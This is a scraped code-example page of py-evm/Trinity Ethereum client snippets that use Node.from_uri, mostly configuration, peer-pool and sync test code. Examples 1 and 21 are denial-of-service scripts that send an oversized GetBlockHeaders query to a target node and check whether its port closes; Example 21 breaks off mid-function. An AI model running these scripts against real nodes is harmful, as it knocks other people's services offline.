Esempio n. 1
0
def _exp(node_url, chain) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id':
            1,
            'query':
            GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff,
                                 False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed,attack success ...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
Esempio n. 2
0
    def __init__(self,
                 network_id: int,
                 max_peers: int = DEFAULT_MAX_PEERS,
                 data_dir: str = None,
                 nodekey_path: str = None,
                 logfile_path: str = None,
                 nodekey: PrivateKey = None,
                 sync_mode: str = SYNC_FULL,
                 port: int = 30303,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.network_id = network_id
        self.max_peers = max_peers
        self.sync_mode = sync_mode
        self.port = port

        if not preferred_nodes and network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id == MAINNET_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in MAINNET_BOOTNODES)
            elif self.network_id == ROPSTEN_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in ROPSTEN_BOOTNODES)
        else:
            self.bootstrap_nodes = bootstrap_nodes

        # validation
        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )

        # set values
        if data_dir is not None:
            self.data_dir = data_dir
        else:
            self.data_dir = get_data_dir_for_network_id(self.network_id)

        if nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey

        if logfile_path is not None:
            self.logfile_path = logfile_path
        else:
            self.logfile_path = get_logfile_path(self.data_dir)
Esempio n. 3
0
 def from_parser_args(cls, args: argparse.Namespace,
                      trinity_config: TrinityConfig) -> 'BaseAppConfig':
     if args is not None:
         # This is quick and dirty way to get bootstrap_nodes
         trinity_config.bootstrap_nodes = tuple(
             KademliaNode.from_uri(enode)
             for enode in args.bootstrap_nodes.split(
                 ',')) if args.bootstrap_nodes is not None else tuple()
         trinity_config.preferred_nodes = tuple(
             KademliaNode.from_uri(enode)
             for enode in args.preferred_nodes.split(
                 ',')) if args.preferred_nodes is not None else tuple()
     return cls(trinity_config)
Esempio n. 4
0
 def from_parser_args(cls,
                      args: argparse.Namespace,
                      trinity_config: TrinityConfig) -> 'BaseAppConfig':
     """
     Initialize from the namespace object produced by
     an ``argparse.ArgumentParser`` and the :class:`~trinity.config.TrinityConfig`
     """
     if args is not None:
         # This is quick and dirty way to get bootstrap_nodes
         trinity_config.bootstrap_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.bootstrap_nodes.split(',')
         ) if args.bootstrap_nodes is not None else tuple()
         trinity_config.preferred_nodes = tuple(
             KademliaNode.from_uri(enode) for enode in args.preferred_nodes.split(',')
         ) if args.preferred_nodes is not None else tuple()
     return cls(trinity_config)
Esempio n. 5
0
    def _get_peer_candidates(self, num_requested: int,
                             connected_remotes: Set[Node]) -> Iterable[Node]:
        """
        Return up to `num_requested` candidates sourced from peers whe have
        historically connected to which match the following criteria:

        * Matches all of: network_id, protocol, genesis_hash, protocol_version
        * Either has no blacklist record or existing blacklist record is expired.
        * Not in the set of remotes we are already connected to.
        """
        connected_uris = set(remote.uri() for remote in connected_remotes)
        now = datetime.datetime.utcnow()
        metadata_filters = self._get_candidate_filter_query()

        # Query the database for peers that match our criteria.
        candidates = self.session.query(Remote).outerjoin(  # type: ignore
            # Join against the blacklist records with matching node URI
            Remote.blacklist,
        ).filter(
            # Either they have no blacklist record or the record is expired.
            ((Remote.blacklist == None) |
             (BlacklistRecord.expires_at <= now)),  # noqa: E711
            # We are not currently connected to them
            ~Remote.uri.in_(connected_uris),  # type: ignore
            # They match our filters for network metadata
            *metadata_filters,
        ).order_by(
            # We want the ones that we have recently connected to succesfully to be first.
            Remote.last_connected_at.desc(),  # type: ignore
        )

        # Return them as an iterator to allow the consuming process to
        # determine how many records it wants to fetch.
        for candidate in candidates:
            yield Node.from_uri(candidate.uri)
Esempio n. 6
0
    def __init__(self,
                 network_id: int,
                 app_identifier: str = "",
                 genesis_config: Dict[str, Any] = None,
                 max_peers: int = 25,
                 trinity_root_dir: Path = None,
                 trinity_tmp_root_dir: bool = False,
                 data_dir: Path = None,
                 nodekey_path: Path = None,
                 nodekey: PrivateKey = None,
                 port: int = 30303,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.app_identifier = app_identifier
        self.network_id = network_id
        self.max_peers = max_peers
        self.port = port
        self._app_configs = {}

        if genesis_config is not None:
            self.genesis_config = genesis_config
        elif network_id in PRECONFIGURED_NETWORKS:
            self.genesis_config = _load_preconfigured_genesis_config(
                network_id)
        else:
            raise TypeError(
                "No `genesis_config` was provided and the `network_id` is not "
                "in the known preconfigured networks.  Cannot initialize "
                "ChainConfig")

        if trinity_root_dir is not None:
            self.trinity_root_dir = trinity_root_dir
        self.trinity_tmp_root_dir = trinity_tmp_root_dir

        if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id in PRECONFIGURED_NETWORKS:
                bootnodes = PRECONFIGURED_NETWORKS[self.network_id].bootnodes
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode) for enode in bootnodes)
            else:
                self.bootstrap_nodes = tuple()
        else:
            self.bootstrap_nodes = bootstrap_nodes

        if data_dir is not None:
            self.data_dir = data_dir

        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )
        elif nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey
Esempio n. 7
0
    async def addPeer(self, uri: str) -> None:
        validate_enode_uri(uri, require_ip=True)

        await self.event_bus.broadcast(
            ConnectToNodeCommand(Node.from_uri(uri)),
            TO_NETWORKING_BROADCAST_CONFIG
        )
Esempio n. 8
0
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Esempio n. 9
0
def _test() -> None:
    import argparse
    import asyncio
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from p2p import ecies
    from p2p.kademlia import Node
    from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()

    context = ChainContext(headerdb=chaindb,
                           network_id=network_id,
                           vm_configuration=ROPSTEN_VM_CONFIGURATION)
    peer_pool = ETHPeerPool(privkey=privkey, context=context)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Esempio n. 10
0
def test_node_from_enr_uri():
    privkey = PrivateKeyFactory()
    address = AddressFactory()
    enr = ENRFactory(private_key=privkey.to_bytes(), address=address)

    node = Node.from_uri(repr(enr))

    assert node.id == keccak(privkey.public_key.to_bytes())
    assert node.address == address
Esempio n. 11
0
def test_node_from_enode_uri():
    pubkey = 'a979fb575495b8d6db44f750317d0f4622bf4c2aa3365d6af7c284339968eef29b69ad0dce72a4d8db5ebb4968de0e3bec910127f134779fbcb0cb6d3331163c'  # noqa: E501
    ip = '52.16.188.185'
    port = 30303
    uri = 'enode://%s@%s:%d' % (pubkey, ip, port)
    node = Node.from_uri(uri)
    assert node.address.ip == ip
    assert node.address.udp_port == node.address.tcp_port == port
    assert node.pubkey.to_hex() == '0x' + pubkey
Esempio n. 12
0
    def __call__(self, parser, namespace, values, option_string=None):
        if values is None:
            return

        enode = Node.from_uri(values)

        if getattr(namespace, self.dest) is None:
            setattr(namespace, self.dest, [])
        enode_list = getattr(namespace, self.dest)
        enode_list.append(enode)
Esempio n. 13
0
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Esempio n. 14
0
    def __call__(self,
                 parser: argparse.ArgumentParser,
                 namespace: argparse.Namespace,
                 value: Any,
                 option_string: str=None) -> None:
        if value is None:
            return

        enode = Node.from_uri(value)

        if getattr(namespace, self.dest) is None:
            setattr(namespace, self.dest, [])
        enode_list = getattr(namespace, self.dest)
        enode_list.append(enode)
Esempio n. 15
0
    async def removePeer(self, uri: str) -> bool:
        validate_enode_uri(uri, require_ip=True)
        peer_to_remove = Node.from_uri(uri)

        response = await self.event_bus.request(GetConnectedPeersRequest())
        for connected_peer_info in response.peers:
            if peer_to_remove == connected_peer_info.session.remote:
                await self.event_bus.broadcast(
                    DisconnectFromPeerCommand(
                        connected_peer_info,
                        DisconnectReason.DISCONNECT_REQUESTED,
                    ), )
                return True
        return False
Esempio n. 16
0
def test_node_from_enr_uri():
    privkey = PrivateKeyFactory()
    ip = socket.inet_aton(IPAddressFactory.generate())
    udp_port = tcp_port = 30303
    enr = ENRFactory(private_key=privkey.to_bytes(),
                     custom_kv_pairs={
                         IP_V4_ADDRESS_ENR_KEY: ip,
                         UDP_PORT_ENR_KEY: udp_port,
                         TCP_PORT_ENR_KEY: tcp_port
                     })

    node = Node.from_uri(repr(enr))

    assert node.id == keccak(privkey.public_key.to_bytes())
    assert node.address.ip_packed == ip
    assert node.address.tcp_port == tcp_port
    assert node.address.udp_port == udp_port
Esempio n. 17
0
async def test_lightchain_integration(request, event_loop, caplog,
                                      geth_ipc_path, enode, geth_process):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this manually, you can use `tox -e py36-lightchain_integration` or:

        pytest --integration --capture=no tests/integration/test_lightchain_integration.py

    The fixture for this test was generated with:

        geth --testnet --syncmode full

    It only needs the first 11 blocks for this test to succeed.
    """
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    # make sure geth has been launched
    wait_for_socket(geth_ipc_path)

    remote = Node.from_uri(enode)
    base_db = AtomicDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    context = ChainContext(
        headerdb=headerdb,
        network_id=ROPSTEN_NETWORK_ID,
        vm_configuration=ROPSTEN_VM_CONFIGURATION,
    )
    peer_pool = LESPeerPool(
        privkey=ecies.generate_privkey(),
        context=context,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)
    server_request_handler = LightRequestServer(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(server_request_handler.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(
        0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())
        event_loop.run_until_complete(server_request_handler.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.coro_get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.coro_get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    peer = peer_pool.highest_td_peer
    head = await peer_chain.coro_get_block_header_by_hash(peer.head_hash)

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.coro_get_contract_code(
        head.hash, contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.coro_get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Esempio n. 18
0
File: peer.py Progetto: tuxxy/py-evm
def _test():
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop
    logging.basicConfig(level=logging.DEBUG,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to")
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class = ETHPeer  # type: ignore
    if args.light:
        peer_class = LESPeer  # type: ignore
    headerdb = FakeAsyncHeaderDB(MemoryDB())
    headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]
    peer_pool = PeerPool(peer_class, headerdb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff():
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.peers:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.peers[0]
        block_hash = decode_hex(
            '0x59af08ab31822c992bb3dad92ddb68d820aa4c69e9560f07081fa53f1009b152'
        )
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto.send_get_block_headers(block_hash, 1)
            peer.sub_proto.send_get_block_bodies([block_hash])
            peer.sub_proto.send_get_receipts([block_hash])
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_headers(block_hash, 1, request_id)
            peer.sub_proto.send_get_block_bodies([block_hash], request_id + 1)
            peer.sub_proto.send_get_receipts(block_hash, request_id + 2)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    asyncio.ensure_future(peer_pool.run())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
async def test_lightchain_integration(request, event_loop):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --enode=...
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(LESPeer,
                         FakeAsyncHeaderDB(base_db), ROPSTEN_NETWORK_ID,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(
        0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.peers[0].head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Esempio n. 20
0
async def test_sync_integration(request, caplog, geth_ipc_path, enode,
                                geth_process):
    """Test a regular chain sync against a running geth instance.

    In order to run this manually, you can use `tox -e py37-sync_integration` or:

        pytest --integration --capture=no tests/integration/test_sync.py

    The fixture for this test was generated with:

        geth --ropsten --syncmode full

    It only needs the first 11 blocks for this test to succeed.
    """
    if not request.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    # make sure geth has been launched
    wait_for_socket(geth_ipc_path)

    remote = Node.from_uri(enode)
    base_db = AtomicDB()
    chaindb = AsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = AsyncHeaderDB(base_db)
    chain_config = Eth1ChainConfig.from_preconfigured_network(
        ROPSTEN_NETWORK_ID)
    chain = chain_config.initialize_chain(base_db)
    context = ChainContext(
        headerdb=headerdb,
        network_id=ROPSTEN_NETWORK_ID,
        vm_configuration=ROPSTEN_VM_CONFIGURATION,
        client_version_string='trinity-test',
        listen_port=30303,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = ETHPeerPool(privkey=ecies.generate_privkey(), context=context)
    syncer = RegularChainSyncer(chain, chaindb, peer_pool)

    async with background_asyncio_service(peer_pool) as manager:
        await manager.wait_started()
        await peer_pool.connect_to_nodes([remote])
        assert len(peer_pool) == 1

        async with background_asyncio_service(syncer) as syncer_manager:
            await syncer_manager.wait_started()

            n = 11

            manager.logger.info(f"Waiting for the chain to sync {n} blocks")

            async def wait_for_header_sync(block_number):
                while chaindb.get_canonical_head().block_number < block_number:
                    await asyncio.sleep(0.1)

            await asyncio.wait_for(wait_for_header_sync(n), 5)

            # https://ropsten.etherscan.io/block/11
            header = chaindb.get_canonical_block_header_by_number(n)
            transactions = chaindb.get_block_transactions(
                header, BaseTransactionFields)
            assert len(transactions) == 15

            receipts = chaindb.get_receipts(header, Receipt)
            assert len(receipts) == 15
            assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
                '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860'
            )
Esempio n. 21
0
def main() -> None:
    logging.basicConfig(level=TRACE_LEVEL_NUM,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('--enode',
                        type=str,
                        help="The enode we should connect to",
                        required=True)
    parser.add_argument('--mainnet', action='store_true')
    parser.add_argument('--light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]
    ip, port = args.enode.split('@')[1].split(':')
    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    if args.mainnet:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = FakeAsyncHeaderDB(AtomicDB())
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=network_id,
        vm_configuration=vm_config,
    )
    peer_pool = pool_class(
        privkey=ecies.generate_privkey(),
        context=context,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    def port_probe(ip, port):
        try:
            TCP_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            TCP_sock.settimeout(1)
            result = TCP_sock.connect_ex((ip, int(port)))
            if result == 0:
                return True
            else:
                return False
                TCP_sock.close()
        except socket.error as e:
            return False

    async def attack() -> None:
        nonlocal peer_pool
        peer_pool.logger.info('Attacking...')
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = peer_pool.highest_td_peer
        if peer_class == ETHPeer:
            block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
            headers = await cast(ETHPeer, peer).requests.get_block_headers(
                peer.sub_proto.cmd_id_offset, max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer = cast(ETHPeer, peer)
        else:
            block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
            headers = await cast(ETHPeer, peer).requests.get_block_headers(
                peer.sub_proto.cmd_id_offset, max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer = cast(LESPeer, peer)
            request_id = 1
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id':
            1,
            'query':
            GetBlockHeadersQuery(decode_hex(block_hash), 1, 0xffffffffffffffff,
                                 False),
        }
        header, body = cmd.encode(data)
